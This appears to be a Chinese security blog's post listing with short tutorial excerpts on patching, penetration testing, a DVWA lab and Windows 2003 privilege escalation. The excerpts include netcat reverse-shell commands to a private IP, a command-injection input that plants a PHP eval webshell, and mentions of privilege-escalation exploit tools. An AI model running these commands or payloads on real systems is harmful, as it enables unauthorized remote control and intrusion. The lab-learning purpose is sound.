- 博客(5)
- 收藏
- 关注
原创 windos漏扫打补丁
** Windos 打补丁**通过各种漏洞扫描工具会得到一份报告打开其中一个举例这里需要注意的地方 记住这个操作系统(说明我们只打服务器的漏洞,各种服务,数据库的需要联系厂商,否则可能导致系统崩溃)一般只需要打中高级漏洞,这两种标识的需要阅读的东西 然后解决办法哪里一般会有补丁网址上面有系统版本下载相对应的一般都是64位版本下载到自己电脑然后找负责管理内网的人员要到他们连接内网的u盘,把补丁拷到u盘里,杀毒...
2020-09-18 09:29:31
462
2
原创 反弹shell
Nc在物理机开启1234端口并监听,在cmd输入:nc.exe -lvvp 1234在被攻击者(windows)电脑cmd中输入:nc.exe 192.168.31.201 1234 -e cmd.exe在物理机就可以看到反弹过来的shell,也能执行命令如果用linux反弹shell,输入:nc 192.168.31.201 1234 -e /bin/bash在物理机也能看...
2019-11-05 19:40:45
312
原创 渗透方面的相关知识
1、信息收集whois查网站源IP,子网站,管理员个人信息,邮箱,联系方式,社工库爆破,cms框架信息,服务器版本信息2、提权(判断系统win linux)首先判断是什么系统,win2008 cmd命令systeminfo查看版本及补丁信息利用ms15-051漏洞序列号提权工具win2003 cmd命令systeminfo查看版本及补丁信息利用ms09-012漏洞序列号提权工具linu...
2019-10-22 09:06:49
613
原创 渗透测试 命令注入(代码注入)Dvwa-low
在输入框输入:8.8.8.8 && echo “<?php @eval($_REQUEST[666])?>”>2.php将一句话木马写入到E:\phpstudy\PHPTutorial\WWW\DVWA-master\vulnerabilities\exec下,形成一个2.php文件运行结果在文件中查看2.php 看到写入成功用中国菜刀连接,添加地址连接成功...
2019-10-11 23:17:55
645
原创 win2003 提权
win2003 提权win2003 提权##实验环境Win2003+vmware15Win2003作为目标机,在物理机浏览器访问192.168.41.131,看是否能访问到iss下的文件##访问已经上传好了的大马,并登录进去##在大马中使用cmd命令,查看whoami,显示为低权限##使用systeminfo查看补丁信息##为了提权,在大马中向目标机的回收站中上传提权.exe软件...
2019-10-11 16:34:58
569
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人